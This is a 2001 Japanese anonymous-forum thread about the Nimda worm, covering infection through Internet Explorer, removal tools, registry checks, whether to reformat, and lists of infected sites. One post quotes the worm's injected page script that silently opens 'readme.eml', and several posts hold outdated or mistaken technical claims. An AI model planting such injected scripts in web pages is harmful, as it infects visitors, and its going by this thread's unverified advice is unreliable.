696 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/22 16:02
>>694

>>505みてちょ。

---

>>494

みてね。

貴重な人柱さんの体験
>>293
>>389
>>400
>>402
>>403

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品


MicrosoftR Internet Explorer 6 (最小構成時のみ)

#なお、本当に最小構成時のみなのかは疑惑視されています。

834 :名無しさん@お腹いっぱい。:01/09/22 23:14
>>832

みなまで言うなって(^^;

835 :名無しさん@お腹いっぱい。:01/09/22 23:18
>>826

アホか。>>823 に「とにかくフォーマット!再いんすとーる」させたってまた感染するだけやん。

836 :名無しさん@お腹いっぱい。:01/09/22 23:20
>>826

こういうやつがパッチ忘れたりして再感染するんだな(w

837 :名無しさん@お腹いっぱい。:01/09/22 23:23
ログみて、カキコされた感染サイトに再訪問してるのですが、ただ閉じただけのところがかなり多いです。こいつらが再開したときがこわいです。

838 :(´∀` ):01/09/22 23:23
何か、本当に次のXP発売の時は、My糞、インストール後の初回起動
アニメで今回の一件の謝罪と、nimuda君の説明アニメ、バグフィク
スの大切さと絡めて解りやすいアニメにして組み込んでもらいたい
ね。。。それが社会的責任だと思われ。信用回復する道だと思われ。
流通ルートに乗せるなら遅いか・・
それに、ニムダ君、元はコンセプトウイルスなんでしょ?
敢えて有効利用してやる逞しさ見せて欲しいよ(w

839 :名無しさん:01/09/22 23:23
>>833
サンクス!

840 :名無しさん@お腹いっぱい。:01/09/22 23:25
ニムダの特徴は感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。

841 :名無しさん@お腹いっぱい。:01/09/22 23:30
>>826

なんかさあ。メール添付ウイルスの概念に毒されてないかい?

そんなので万事解決と思えるなんてうらやましいよ。

842 :823:01/09/22 23:33
>>826 >>827
ありがとうございます。
それで駆除ツールなんですけど、シマンティックのHPに紹介されてあるやつなんです。
( ここ→ http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a%40mm.removal.tool.html
結果は全部英語で出てきます。
パターンですが、いま現在、最新のを使用しています。
それと、レジストリの話が出ていましたが、駆除ツールで成功した(?)あとに、レジストリエディタを検索したら、「W32.Nimda.A@mm」「readme.exe」「readme.eml」が見つかりました。
Cドライブで検索したら見つからなかったんで安心してたんですが、レジストリの中にあったらやっぱりだめですか?
検索はちなみに、「名前」のとこに検索名を入れるんですよね? 「含まれる文字列」に入力するんじゃないですよね?
すいません、教えてくださった>>73のスレに移動しますが、ここまでご教示ください。

843 :名無しさん@お腹いっぱい。:01/09/22 23:33
>>831
IPAは予防策はIE6をインストールすることだって言ってる。
ttp://www.ipa.go.jp/security/topics/newvirus/nimda.html

844 :名無しさん@お腹いっぱい。:01/09/22 23:34
>>840
じゃあ 感染しない人は感染しないのかな?
IE5.5SP2だけど、今んところ大丈夫みたい。

845 :名無しさん@お腹いっぱい。:01/09/22 23:37
>>843
ずっと前に書いたけど、漏れは感染した(っていうのかな?)よ
発病はしなかったけど

846 : お〜〜い:01/09/22 23:37
NIMDA 改竄版か???
さっきから状態変わったよ。CodeREDが可愛いくらいだったNIMDAだが、
default.ida XXXXXXXXXXパターンのCodeRED似が、同じIPアドレスから連続攻撃です。
すげぇシツコイのですが、これってNIMDAの第2段?
CodeREDんときより状態ちがう、、、連続数十回パターン。
その裏でNIMDA静か・・

847 :シカーリしてくれよ:01/09/22 23:39
child1.aibotown.com

848 :名無しさん@お腹いっぱい。:01/09/22 23:42
>>844
>じゃあ 感染しない人は感染しないのかな?

その通りだ。

849 :名無しさん@お腹いっぱい。:01/09/22 23:42
>>846
俺もCodeRedIIからはたまに連射くらうよ。
Nimda登場前からだったし関係ないと思う。

850 :名無しさん@お腹いっぱい。:01/09/22 23:43
>>842
でてきた、でてきた
レジストリに書き込まれてるね
ExolorerBars内のところにLoad.exeとかいわゆるNimda関連の
ファイル名が!一応昨日、一昨日と駆除ツール使ったけどね。
やっぱIE6は駄目だ(W2K版ね)

851 :名無しさん@お腹いっぱい。:01/09/22 23:48
Apache に対する Codered と Nimda のアタック数を表示する
LINUXの cgiスクリプトです。
http://www.yokohama-bay.net/tool/atack/index.html

852 :名無しさん@お腹いっぱい。:01/09/22 23:52
かつての感染サイト。

http://www.cnet-try.ne.jp/f/fuji/index.htm

復旧したようだが、ソースを見ると・・。

こんなのでちゃんと完治ちているのでしょうか・・。

853 :名無しさん@お腹いっぱい。:01/09/22 23:54
>>850
それはExplorerで検索した文字列の履歴のような気がする。

854 :名無しさん@お腹いっぱい。:01/09/22 23:56
>>852

ウィルス除去ソフトでは完全にhtml内のスクリプトを除去しないか
ほっぽらかしなんだろうね。

855 :842:01/09/22 23:56
>>850
でも、症状がでてないみたいなんですよ。
readme.emlとかいっぱいできるらしいんですけど、特になかったですし・・
勝手にPC内のファイルを送ってしまうらしいですが、対象となる差出人等のアドレスを全部消してしまったらどうでしょう?
っていうか、OE自体を削除したら大丈夫?

856 :名無しさん@お腹いっぱい。:01/09/22 23:59
>>850
つまりIE6は>>403 ってことだ・・・!

857 :名無しさん@お腹いっぱい。:01/09/23 00:03
とりあえず、今は何ともないからねぇ
でも気持ち悪いからフォーマットしとく
明日・明後日と休みだしね・・・
とにかくIE6にはやられたってことが良く分かったよ

858 :名無しさん@お腹いっぱい。:01/09/23 00:05
がいしゅつIPAのページ。

http://www.ipa.go.jp/security/topics/newvirus/nimda.html

ブラウザにパッチを適用する。:
InternetExplorer 5.01の場合、SP2 を適用する。
InternetExplorer 5.5 の場合、SP2 を適用する。
(パッチの適用方法については、マイクロソフト社のサイトでご確認ください。:マイクロソフト社「ホームユーザー向け セキュリティ対策 早わかりガイド」のページ )

                       ρ(^-^)
あるいは最新の InternetExplorer 6.0 をインストールする。

この書き方は無責任でないかえ?
MSのページだってIE6の最小インストールはダメだ、って書いてあるのに、パッチはよくわからんからIE6だ!ってヒトはMSのウイルスページ見ないでやっちゃうかも・・。

859 :名無しさん@お腹いっぱい。:01/09/23 00:08
 

860 :名無しさん@お腹いっぱい。:01/09/23 00:09
IE6はOutlookExpressを使わないからって言ってインストールしないでいると、
古いOutlookのコンポーネントが残って、それが穴になる。
不正MIMEの問題はIEじゃなくてOutlookのコンポーネントにあったんじゃないのかな

861 :名無しさん@お腹いっぱい。:01/09/23 00:10
6だ6だと騒いでいるが、ウイルス騒ぎのまっただ中にはじめて正式リリースされた正式版の6を、感染前からインストールしていたヒトがそれほどいるとも思えないのだが・・。

862 :名無しさん@お腹いっぱい。:01/09/23 00:13
さっさとフォーマットすれば全て解決ばかじゃん?お前ら

863 :名無しさん@お腹いっぱい。:01/09/23 00:16
肝心なこと聞くの忘れちゃった。
仮に発症して、PC内のファイルとか勝手に送られちゃう動きをしたら、ノートン先生が止めてくれるかな?
トロイの木馬みたいに外からPCを操作するような動きも、ノートン先生が防いでくれるかな?

864 :名無しさん@お腹いっぱい。:01/09/23 00:17
>>862

何が解決するんだ(w

865 :名無しさん@お腹いっぱい。:01/09/23 00:20
何が解決するんだ

866 :名無しさん@お腹いっぱい。:01/09/23 00:20
>>863

ノートン先生といってもいくつかあるからねぇ。
漏れはインターネットセキュリティーってのだけど、ふれこみからすると、そうならないと困るねぇ。

867 :名無しさん@お腹いっぱい。:01/09/23 00:21
>>862おまえのアタマもはやくフォーマットしてウイルス除去したほうがいいぞ(藁

868 :名無しさん@お腹いっぱい。:01/09/23 00:21
>>862
もういいじゃん

869 :名無しさん@お腹いっぱい。:01/09/23 00:22
IE6の方が5.5より感染率低いです。

870 :名無しさん@お腹いっぱい。:01/09/23 00:23
>>868

>>862のアタマもフォーマットすれば全て解決ばかじゃん?>>862

871 :名無しさん@お腹いっぱい。:01/09/23 00:24
>>863
発症した時点でアウト。
どういう仮定なんだ?

872 :名無しさん@お腹いっぱい。:01/09/23 00:24
>>862
言ってることずれてるみたいだよ。短絡的すぎ。
それじゃファイルが助からなかったりするから、みんな困ってアドバイスもらってるんだと思うけど。

873 :名無しさん@お腹いっぱい。:01/09/23 00:26
>>872
ファイルはバックアップしておくもの。それを怠ったのだからしかたないだろばかか?
つーか死ね

874 :名無しさん@お腹いっぱい。:01/09/23 00:27
フォーマットするのはいいが、
OS入れた後はまず先にワクチンソフト入れなよ

875 :追加:01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

876 : :01/09/23 00:29
>>862
さっさとフォーマットしてOS入れ直してまた感染…
問題の解決になってないよ(藁

877 :名無しさん@お腹いっぱい。:01/09/23 00:30
>>876
ははは そうだね だからここで対策を話してるのにね

878 :金持ち喧嘩せず:01/09/23 00:31
新しいパソコンかうから問題なし。
データは印刷して、手入力で入力させるからOK
ドライバー類もダンプリストから手入力させるからOK

879 : ◆tkE/ZO.Y :01/09/23 00:31
まだいたのか、前スレからのフォーマット粘着君...

880 :名無しさん@お腹いっぱい。:01/09/23 00:31
>>875

ワラタ

873はニムダ感染決定。はやく管理者にフォーマットしてもらえ。っていうか氏ね

881 :名無しさん@お腹いっぱい。:01/09/23 00:32
>>876
フォーマットでおしまいだよ。
OS入れちゃダメ。

882 :名無しさん@お腹いっぱい。:01/09/23 00:32
感染するのはNT系だけでしょ?
普通の人は98だから関係ないって!

883 : :01/09/23 00:34
>>882
お前スレ読んでないだろ

884 :名無しさん@お腹いっぱい。:01/09/23 00:34
>>881

おまえドリキャスだったんだ(w

885 :はぁ?:01/09/23 00:35
>>882
Windows95以降の全てのOSで感染/発病するんだよ!
しっかりしてくれ!

886 :名無しさん@お腹いっぱい。:01/09/23 00:35
>>882
 誰がそんなデマ流したのよ....

887 :名無しさん@お腹いっぱい。:01/09/23 00:36
882の話にビックリしてワクチンメーカ調べて回った俺はアホですか?

888 :名無しさん@お腹いっぱい。:01/09/23 00:36
>>881

ドリキャス君にはかなわねーや。オマエ、ホントはフォーマットしたことないだろ?

889 :名無しさん@お腹いっぱい。:01/09/23 00:37
>>882
ネタだよね?

890 :名無しさん@お腹いっぱい。:01/09/23 00:38
>>889そうでもないらしい、他のスレッドで本気にしてる奴いる

891 :名無しさん@お腹いっぱい。:01/09/23 00:40
>>890
あらま、どっから流れるんだろうかそんな情報

892 :名無しさん@お腹いっぱい。:01/09/23 00:40
>>890
IISの話とIEの話を勘違いしてるんじゃないの?

893 :名無しさん@お腹いっぱい。:01/09/23 00:42
>>887

アホです(ワラ

でも、ビックリすることは無いだろ?

仮にNT系だけだとしても98系も対処しといて損は無いんだから。
まぁ、確かな知識を仕入れときたい気持ちはワカルが・・・

894 :名無しさん@お腹いっぱい。:01/09/23 00:44
ちゃんとここに9X系も感染するとかいてある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

895 :名無しさん@お腹いっぱい。:01/09/23 00:45
テレビのニュースでも取り上げられてるぐらいだからね
初心者が混乱するのも分かる気もするが・・・

896 :819:01/09/23 00:47
遅レスだが

>>824

なるほど。でも、誰が拘ったんだろ?

会社で仕事してると、LAN外すのと機能麻痺しちゃうのよ。
だから、せめてLAN環境だけ残したいと思って、あの質問
したんですけどね。伝わりませんでしたか。

共有マウントも何も、共有自体無効にする気もないんで・・。

897 :名無しさん@お腹いっぱい。:01/09/23 00:49
おそらくガセネタの原因はここ↓
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
IISに関する感染のところにNT/2K系の事しか書いてないので、
IEのことと混同したアホが流したんだと思う。
俺はIISは使ってないのでIISがNT/2K系でしか感染しないのかどうかは知らない。

898 :名無しさん@お腹いっぱい。:01/09/23 00:50
>>873
だから怠った人とか、事情があってバックアップとれなかった人が、困って助けてもらってんじゃん。
中途半端に賢くならないで、もっとオトナになってから主張してね。

899 :名無しさん@お腹いっぱい。:01/09/23 00:52
>>869

>IE6の方が5.5より感染率低いです。

ホントに数じゃなくて率?率なんてどうやって調べたの?

900 :名無しさん@お腹いっぱい。:01/09/23 00:53
----------------------------
REGEDIT4

[HKEY_CLASSES_ROOT\.eml]
"Content-Type"="text/plain"
----------------------------
で、IE経由の感染はとりあえず防げると思われ

901 :名無しさん@お腹いっぱい。:01/09/23 00:54
>>898

フォーマットしたことなくて憧れてるドリキャス君なんだよ。ゆるしてあげようよ。

今度来たらスレ違いってことで。

902 :名無しさん@お腹いっぱい。:01/09/23 01:03
Nimda 感染サイト情報

マルコ株式会社
ttp://www.maruko-j.co.jp

協和機電工業株式会社
ttp://www.kyowa-kk.co.jp

株式会社エー・ティ総合研究所
ttp://www.atri.co.jp

株式会社シーエスディー
ttp://www.powerstage.com/default1.asp

県木住 青森県木造住宅普及推進協同組合
ttp://www.powerstage.com/~kenmokujyu/
ttp://www.powerstage.com/~kenmokujyu/exam/kentiku/kentiku_S8.html

愛知県尾張繊維技術センター
ttp://www.fdc.or.jp/owari/index.html
ttp://www.fdc.or.jp/owari/cad/

withマガジン-週刊インタラクティブ・ミュージシャン
ttp://www.with9.com/mag/0009-1h/0009-1h.asp

903 :名無しさん@お腹いっぱい。:01/09/23 01:06
俺は前スレからの粘着フォーマット君ではないが、
フォーマットしないで安易な対策を薦めるのは無責任だと思うぞ。
バックドアが入っていた以上フォーマットを薦めるのは常識的だ。
バックドアを利用したクラックツールが入っている可能性を考慮して、
本人のため(他人のためでもある)を思うならまずフォーマットを薦
めるべきだ。

904 :名無しさん@お腹いっぱい。:01/09/23 01:07
>>902

殆ど色変わってるんですけど、僕はチャレンジャーでしょうか?

905 :863:01/09/23 01:08
>>871
インターネットセキュリティって、PC内のあやしいプログラムが勝手に外部にファイルを送信したり、逆に外部からPCの中身を操作するのを防いでくれるんでしょ?
だから発症しても、そういう動きは止めてくれるんじゃないの?
って、なんか勘違いしてそうで恥ずかしいけど・・

906 :ー):01/09/23 01:09
>>904
紙一重だと思われ

907 :名無しさん@お腹いっぱい。:01/09/23 01:11
>>906
いやちがうな、おもいっきりチャレンジャーだ。

908 :名無しさん@お腹いっぱい。:01/09/23 01:10
フォーマットってこんな機会でもなければ最近やるチャンスないもんなぁ。
憧れる気持ちもわかるよ。
ゲーム機のヒトにとってはリセットみたいなものに見えるんだろうね。
失敗したとこからやりなおし。

909 :名無しさん@お腹いっぱい。:01/09/23 01:12
フォーマットで解決するならとっくの昔にコードレッドのバックドアからやってるよ。
フォーマットなんかしても解決にならん事で意見も一致してた。
いまさらぶり返さんでくれ。

910 :904:01/09/23 01:12
>>906

やっぱ?

しかもNIMDAだけじゃないんだよね、そういう感染サイトって・・・。

放射線防護服着てたけど、地雷踏んじゃったって言う事もあるから
もう止めとく。

911 :名無しさん@お腹いっぱい。:01/09/23 01:12
>>904
そう言う君はフォーマット君です(藁
フォーマットするかしないかは管理者の自由。
今はとにかく穴塞いでNIMDAを退治することが先決なんだよ。

912 :904:01/09/23 01:13
いや、多分906は、馬鹿とチャレンジャーの紙一重だと
言っていると思われ。

我ながらそう思う。

913 :名無しさん@お腹いっぱい。:01/09/23 01:14
>>902

かなりのサイトが「ページを表示できません」状態ですね・・。
ここが復活するときが恐い(´。`;)

914 :904:01/09/23 01:14
ごめん、912は
>>907へのレス。

915 :名無しさん@お腹いっぱい。:01/09/23 01:15
>>911
しかし、穴にはバックドアも含まれるしパッチ当ててもNimdaを
駆除してもバックドアはふさがらない。

916 :名無しさん@お腹いっぱい。:01/09/23 01:16
つーか、企業の場合フォーマットするより
パッチ当ててワクチンソフト入れた方が安上がりな場合が多い。
特に複数の会社が絡んだサーバなんて当にそれ。
こういうのはマジで入れ直すのに数十万〜数百万かかるぞ。

917 :名無しさん@お腹いっぱい。:01/09/23 01:16
>>908
ーー 受信バイト・送信バイトが異常に増えます。 −−
スレの24に初心者にも良く分かるように書いてある。まず読んでくれ。
繰り返しになるがネットワーク管理者ならフォーマットを薦めるのが
常識。

918 :名無しさん@お腹いっぱい。:01/09/23 01:19
>>902
>Nimda 感染サイト情報

いま死んでいるサイトでよいのなら、

ヒュンダイジャパン
http://www.hyundaijapan.co.jp

ここは外せないニダ。

919 :名無しさん@お腹いっぱい。:01/09/23 01:20
>>915
パッチすら当てない管理者がフォーマットするとは思えない・・・

920 :863:01/09/23 01:21
>>866
どうでしょう?

921 :名無しさん@お腹いっぱい。:01/09/23 01:22
フォーマットを薦めるのが常識なのはクライアントの場合。
いちいち説明してらんないだろ。

922 :名無しさん@お腹いっぱい。:01/09/23 01:26
>>920
全く効果ないとは言わんが、感染してしまえばなんでもありだ。
いくらでも方法はある。感染者のPCの状況を正確に把握するのは
掲示板上では非常に困難だ。状況も正確に判断せずに安易な対策
を薦めるのは、やはり俺には無責任だと思えてしまうのだよ。

923 :>>908:01/09/23 01:26
>>917

前後の文脈でおわかりと思いますが、私はこのレスに感想を述べています。

   ρ(^-^)
>>881

OSを入れなくてよい理由を>>24を使って合理的に説明してください>>917

924 :sage:01/09/23 01:30
そろそろsage

925 :名無しさん@お腹いっぱい。:01/09/23 01:31
保存してたHTMLファイルは感染してる可能性あるんで、棄てなければだめ?
ほかにJPGとかの画像ファイル、アイコンはどうかな?
フォーマットしても、どのファイルは戻しても安全なのかわからない・・

926 :sage:01/09/23 01:34
HTMLが感染?ハァッ?

927 :名無したんに接続中・・・:01/09/23 01:35
>>925
DLLやらexeはやめた方がいいだろうな
HTMLはエディタで開いてみれば一目瞭然。
(っつってもreadme.emlがなかったら一応大丈夫だが)
JPEGやらの画像ファイルは大丈夫だろ。

928 :マジなら怖い・・・:01/09/23 01:35
シマンテックのサイトだと、実行ファイルへの感染とか、Explorerにウイルスを挿入するとか、
結構怖い事書いてるんだけど、これホントなんすかね?
こういうこと書いてるのシマンテックだけだと思うんだけど・・・

929 :名無しさん@お腹いっぱい。:01/09/23 01:36
>>923
何で俺が、、、俺は917の人格を尊重しろといっているのではない。
917の発言によってフォーマットして対策すること自体を蔑むような
このスレの傾向はどうかな?っと思っているだけだ。

930 :名無しさん@お腹いっぱい。:01/09/23 01:37
>>928
Explorerはどうか知らないがmmc.exeはなんかアタッチしてるね。

931 :929:01/09/23 01:38
あっ、すごい間違い917→881ね。

932 :名無しさん@お腹いっぱい。:01/09/23 01:40
シマンテックのノートンアンチウイルスの最新パターンでチェックしていたものの、
検出「除外」に重要なファイルが指定されてて、感染を検出できなかったやつがいた。
おかげで被害増大。

933 :名無しさん@お腹いっぱい。:01/09/23 01:42
>>929
フォーマットするってのは別に悪いこととは思ってないです漏れは
ただ、言い方ってのもあるでしょ?
あ 別に917さんのことじゃなくてね。
ぼけとかかすとかっていわれるとねぇ そんなとこです。

934 :名無しさん@お腹いっぱい。:01/09/23 01:44
>>881のような説得力のない書き込みのあとにそれを肯定するような書き込みをするのは、初心者を疑心暗鬼にさせるだけで、無責任の誹りはまぬがれないだろう。
初心者はできればフォーマットなどしたくないものだ。
元の質問は初心者のものだと分かっているのだし、フォーマットだフォーマットだとあおり立てれば余計に不安になって他の方法へ回避しようとするだろう。
また、フォーマットをしてもそのあとの対応が必要だ。
感染直前の状態まで復元しても容易に再び感染してしまう。
これではフォーマットは無意味だ。

主としてここではそうならないための「対策」を論じあっているのであって、ここでは現状の「解決」策を述べているのではない。

そうしたことは、ここで質問をしたものにとってはフォーマット前にここで知っておかなければ、接することができなくなってしまう。

なので順を追って説明をすべきで、安易で不用意なフォーマット君は批判されるべきだろう。

そうせずフォーマットは正しいことだけを説明するならそれは無責任だ。

935 :名無しさん@お腹いっぱい。:01/09/23 01:45
>>928
NTでは Excel.exeや Netscape.exeに感染しているのを見たことがある。
少なくともノートンだとウイルス部分だけ駆除可能だった。
ただ、なんでかよくわからんが、Win98ではそんな症状を見たことがない。
レジストリの App Pathからアプリを探して感染するってのは NTだけかも?

936 :新スレ:01/09/23 01:48
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275
誰かリンクとかしてちょ。

937 :名無しさん@お腹いっぱい。:01/09/23 01:52
>>936

どこまでホンキですか?(^^;

938 :928:01/09/23 01:53
>>930
うーん、これもriched20.dllと同じく、よく書かれてますけど、
うちだと検索にひっかからないんですよね。

>>935
そうだと、ウチは98なんで影響出てないのかもしれないですね。
NT系以外で、実行ファイルに感染したって方いますかね?

なんか、乱数使ってたりもするみたいですが・・・

939 :Nimda !! その産:01/09/23 01:55
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275
今リンクがんばってます。Nimda !! その産

940 :名無しさん@お腹いっぱい。:01/09/23 01:56
>>926

こういうののことな。(多分)

<SCRIPT language=JavaScript>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</SCRIPT>

941 :名無しさん@お腹いっぱい。:01/09/23 02:00
>>934
納得できる部分とそうでない部分がある
○順を追って説明をすべきで、安易で不用意なフォーマット君は批判されるべきだろう。
 これはその通りだ、安易にフォーマットだけして後の指示を何もしないのは非難されて
 も仕方ない。
○説得力のない書き込みのあとにそれを肯定するような書き込みをするのは、初心者を疑
 心暗鬼にさせるだけで、無責任の誹りはまぬがれないだろう。
 この件に関しては納得いかないなぁ。読み返せば分かるが929で言ったようにフォーマッ
 トして対策することの重要性が誤解されそうだ。
 誰だってフォーマットするのは大変だ。出来ればやりたくない。しかしその必要がある
 場合には(バックドアを含むNimdaなどに感染した場合など)その必要性をしっかりと初
 心者に伝えるべきだと思う。たとえ面倒くさい作業であっても・・

942 :名無しさん@お腹いっぱい。:01/09/23 02:00
>851
早速、使わせてもらいました。
でも、うちのDX2-50Mhz のルーター兼サーバーでは重くてとても公開できそうにないです。
メンバーページにおいて、自分専用にしよう。
Perlを始めたところで、こういうの作りたかったのです。

ありがとうございます。

943 :Nimda !! その産:01/09/23 02:03
新スレあんな感じでよいですか?まだ足りない?

944 :名無しさん@お腹いっぱい。:01/09/23 02:03
>>927

>HTMLはエディタで開いてみれば一目瞭然。
>(っつってもreadme.emlがなかったら一応大丈夫だが)

これをやろうとしてポイントしただけで感染した例があります・・。
readme.emlがなくても、未対策環境ではこうした HTML ファイルをポイントしただけで自覚なしのダウンロード・感染となる場合があります・・。

945 :名無しさん@お腹いっぱい。:01/09/23 02:15
>>944
ポイントって、目的のHTMLファイルをアクティブにするのに、シングルクリックするってことだよね?
じゃ、保存してたHTMLの感染(書き換え)されたものは、けっきょくいじれないってことになるから、やっぱり棄てなきゃだめなのかな・・

946 :名無しさん@お腹いっぱい。:01/09/23 02:16
しかし、そろそろ変種が出てきてもよさそうなもんだけど、出てこないねぇ。
当初は安易に改造できそうな気もしたのだけど。
気もゆるんだころにガツンとくるのだろうか・・。

947 :名無しさん@お腹いっぱい。:01/09/23 02:19
>>945

こういうケースね。
>>460-464


>>701
ハッ!!(・д・)

これ読むと、
>>460-464

readme.emlファイル
reame.exeファイル
nimda感染ファイル

を手動で検索しちゃダメぢゃん!場合によってはさわっただけで感染するし、その場合ドラッグや右クリックで削除できない(感染する)じゃん!!

948 :名無しさん@お腹いっぱい。:01/09/23 02:22
Nimda !! その産
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

作っておきました。いっぱいになったら移動してください。

949 :名無しさん@お腹いっぱい。:01/09/23 02:25
>>948

ありがとうございました。
ご苦労さまです。

950 :名無しさん@お腹いっぱい。:01/09/23 02:26
>>947
ええええーっ
じゃ、確認方法とかにある「readme.emlとreadme.exeが、検索して無かったら感染されていません」っていうところの、「検索」ってどうやるの?

951 :名無しさん@お腹いっぱい。:01/09/23 02:35
>>950

やっちゃダメ。不用意にやると感染します。

見つけたところで安易に捨てられないです。

952 :名無しさん@お腹いっぱい。:01/09/23 02:39
このへんしこしこコピペしてたの漏れなんだけど、やっぱFAQにするのは σ(^-^;;の仕事かな・・。

>>696
>>697
>>698

953 :名無しさん@お腹いっぱい。:01/09/23 02:50
>>652
wevの場合アプリやインストール設定によって関連付け等が変更されている事があり。
動作パターンが多いと思われます。
FAQにすると大変だと思うよ。

954 :名無しさん@お腹いっぱい。:01/09/23 02:51
>>953>>952へのレスです。ゴメン

955 :名無しさん@お腹いっぱい。:01/09/23 02:55
>>951
検索自体はマズくないのなら、DOSで削除すればいいのでは?

956 :名無しさん@お腹いっぱい。:01/09/23 03:09
このすれ1000でもったいないから、ここからNimdaに関するどうでもいいような、
話題を語るスレにしよう。

957 :名無しさん@お腹いっぱい。:01/09/23 03:15
じゃあ、みんなアクセスランプぴかぴか光ってた?昨日、一昨日と。
飛んできてないからどんな感じなのか全然分からん。

958 :名無しさん@お腹いっぱい。:01/09/23 03:37
>>957
このすれ下がっていく一方だからフォロー期待しちゃだめよ。
独り言でもかまわないぐらいどうでもいいネタが相応しい。

959 :名無しさん@お腹いっぱい。:01/09/23 03:48
あ〜、暇だ。

960 :FAQer:01/09/23 03:51
>>952

書いてきたよ・・σ(^-^;;

961 :名無しさん@お腹いっぱい。:01/09/23 03:57
>>959

もしかしてニムダ待機のヒト?

お疲れさまですm(_ _)m

962 : :01/09/23 04:15
18日のことだけど、速報版で
「readme.exe実行したけどなんともないよ?」
とかカキコしてた奴どうしたろうか? 藁

963 :950:01/09/23 04:16
>>951
(新スレに書いてしまいました)
それじゃどうしたらいいんでしょう・・(泣)
いちおう駆除ツールで処理して、その後、確認のために最新のノートンでウィルスチェックしたら大丈夫だったんです。
でも、レジストリエディタを検索したら、例のreadme.emlやら.read.exeやら見つかりました・・
もう、わけわかりません・・
前述の処置をしててもだめなのですか?
レジストリのこいつら、削除しても意味ないっすか?

964 :名無しさん@お腹いっぱい。:01/09/23 04:21
>>950
レジストリのどの辺よ?

965 :名無しさん@お腹いっぱい。:01/09/23 05:56
Nimdaのお陰でCodeRedのアタックも激減した。
Nimdaが良い奴に思えてきた。

966 :950:01/09/23 05:59
>>964
二箇所に見つかったんですが、それぞれNimda、admin.dll、readme.exe、*.eml、readme.eml、がありました。
「HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU」
「HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU」
ちなみに、同じ場所に、以前トロイ系のTRO_Jウィルス発見したことがあります。

967 :名無しさん@お腹いっぱい。:01/09/23 06:08
>>966
そりゃ「検索→ファイルやフォルダ」の履歴だろ。

968 :966:01/09/23 06:21
>>967
じゃ、レジストリエディタの中にニムダウィルスが存在してたわけじゃないんですか?
履歴だから、ファイルそのものの存在を示してるわけじゃないっていう理解でいいですか?
だったら、駆除ツールで無事全部削除されてたってことですよね。
そうならやっと肩の荷がおりるんですが。

969 :名無しさん@お腹いっぱい。:01/09/23 06:35
>>968
>履歴だから、ファイルそのものの存在を示してるわけじゃないっていう理解でいいですか?
そうなんだけど、其れあんたが入力したんだよ。
>だったら、駆除ツールで無事全部削除されてたってことですよね。
其れは知らんよ。

970 :968:01/09/23 06:43
>>969
ありがとうございます。
そっかぁ、自分で入れたやつかぁ・・
おまぬけだけどわかって嬉しいっす(苦笑)
もう一つの「HKEY_USERS\〜」も検索の履歴ですか?

971 :名無しさん@お腹いっぱい。:01/09/23 06:53
>>970
キー名見れば分かるでショーが。ユーザー別の枝だよ。

972 :名無しさん@お腹いっぱい。:01/09/23 07:11
あ〜、感染させるのも飽きた

973 :970:01/09/23 07:21
>>971
その「ユーザー別の枝」の先に見つかったreadme.exeなども、履歴と同じで実態のないもので、問題がないと考えていいんですか?
二箇所の存在を伝えて、「そりゃ、検索→ファイルやフォルダの履歴だろ」ってアドバイスいただいたわけですから、そう推察はできるんですが、確信がもてないんで再度お聞きしました。
PCになじんでる方には当たり前に理解してることでも、シロウトにはその当たり前が欠落しているんです。
お手数かけてすいません。

974 :名無しさん@お腹いっぱい。:01/09/23 07:25
>>972
だめじゃん

975 :名無しさん@お腹いっぱい。:01/09/23 07:31
>>974

しかし、感染者がアクセスカウンタでしか確認できんってとこが悲しい

976 :名無しさん@お腹いっぱい。:01/09/23 07:33
いいんでないの?
IE使ってるくせにパッチ当ててないんだから

977 :名無しさん@お腹いっぱい。:01/09/23 07:34
>>975
ジブンサエヨケレバ人間発見

978 :名無しさん@お腹いっぱい。:01/09/23 07:37
>>977

別にいいんでないの?

979 :名無しさん@お腹いっぱい。:01/09/23 07:37
なんか中途半端に賢くて、中途半端に親切な人多いね、ここ(苦笑)

980 :名無しさん@お腹いっぱい。:01/09/23 07:40
てゆうか情報全然ないじゃん、ここ

981 :名無しさん@お腹いっぱい。:01/09/23 07:48
>>980
じゃ、なんでこのスレ見てんの?(笑)
っていうか、そんな頭いいんならちみが情報あげれば?

982 :名無しさん@お腹いっぱい。:01/09/23 07:50
あるかと思って見に来たの
でも、なかった

情報もってることに頭の善し悪しって関係あるの?

983 :名無しさん@お腹いっぱい。:01/09/23 07:53
>>978
いいのか?ゴミトラフィック増えて速度低下するぞ?

984 :名無しさん@お腹いっぱい。:01/09/23 07:55
今でも速度低下してないんだけど・・・

985 :名無しさん@お腹いっぱい。:01/09/23 07:56
>>982
情報だけ貰いに来たんなら、余計な書き込みしないで、ROMしてればいいと思うよ。

986 :名無しさん@お腹いっぱい。:01/09/23 07:58
えっ、書込んじゃいけないの?

じゃぁ、あんた止めれば?

情報がないって言うのも情報なんだけど

987 :名無しさん@お腹いっぱい。:01/09/23 07:59
>>986
なんだコイツの論理は・・・

988 :名無しさん@お腹いっぱい。:01/09/23 08:01
>>987
やめておけ。
ただの粘着ヴァカだ

989 :名無しさん@お腹いっぱい。:01/09/23 08:01
>>987って頭悪いね

990 :名無しさん@お腹いっぱい。:01/09/23 08:03
内容はともかく

>情報がないって言うのも情報なんだけど

は正論だ。

991 :名無しさん@お腹いっぱい。:01/09/23 08:10
>>986
>>982は オマエの持ってる情報も出せばいいだろう?って意味で言ったのだろうと思われ
オマエの理屈はようわからんな

992 :名無しさん@お腹いっぱい。:01/09/23 08:16
>>982
